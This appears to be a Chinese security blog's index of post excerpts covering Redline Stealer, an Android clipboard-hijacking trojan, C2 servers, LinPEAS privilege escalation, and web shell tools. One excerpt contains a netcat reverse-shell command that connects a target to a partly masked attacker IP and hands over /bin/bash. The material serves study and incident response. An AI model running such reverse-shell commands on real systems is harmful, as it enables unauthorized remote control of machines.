Just run

摘要： http://www.broadview.com.cn/article/124 https://www.freebuf.com/articles/network/255302.html https://javamana.com/2021/12/202112270415304965.html ssh 阅读全文

摘要： Redline Stealer 执行流程 Entity2：存储配置数据的结构。 Entity7：存储收集结果的结构。（环境细节+实体1）Entity1：存储凭证详细信息的结构。 环境详细信息，包括受感染的 PC 信息凭证详细信息，包括加密钱包、帐户和用户数据信息 阅读全文

摘要： 一旦恶意应用被打开，它就会显示一个虚假的错误信息并退出，然后在后台默默地运行。恶意应用将其图标隐藏在Android主屏幕上的应用程序列表中，如果不仔细查看就很难发现。随后，在每次打开受感染的智能手机或平板电脑时，Clipper木马就会随之自行启动。Clipper木马会随时监视剪贴板内容的变化。一旦用户将电子钱包地址复制到剪贴板，它就会将地址发送到由网络犯罪分子控制的命令和控制服务器。然后，从服务器 阅读全文

摘要： 概念 C&C （Command and Control server，命令和控制服务器），也可写作C2，是一种用于向受恶意软件（自动程序（bot）、木马（rootkit）、蠕虫（worm））感染的计算机的服务器的恶意软件发送指令或更新程序的服务器，即C&C服务器用于控制这些恶意软件。通常，C&C 服 阅读全文

摘要： https://bypass007.github.io/Emergency-Response-Notes/ openssl后门可以试试看 https://bypass007.github.io/Emergency-Response-Notes/privilege/%E7%AC%AC4%E7%AF%8 阅读全文

摘要： https://knightyun.github.io/2021/09/04/exploit-take-down-swindle-website https://knightyun.github.io/2021/12/06/exploit-penetrate-bocai-website 阅读全文

摘要： LinPEAS - Linux Privilege Escalation Awesome Script linxu 提权脚本 https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS 直接使用： CVEs Check Vulnerable 阅读全文

摘要： https://xz.aliyun.com/t/9488 攻击机开启本地监听： netcat -lvvp 2333 目标机主动连接攻击机： netcat 47.xxx.xxx.187 2333 -e /bin/bash # nc <攻击机IP> <攻击机监听的端口> -e /bin/bash bas 阅读全文

摘要： https://www.freebuf.com/sectool/247104.html https://github.com/BeichenDream/Godzilla Web shell 与 冰蝎、蚁剑、哥斯拉（新手必看） https://blog.csdn.net/weixin_54161921 阅读全文

摘要： https://www.kancloud.cn/a173512/thinkphp6/2452937 数据库配置 config\database.php 文件里面 // 服务器地址 'hostname' => env('database.hostname', '127.0.0.1'), // 数据库名 阅读全文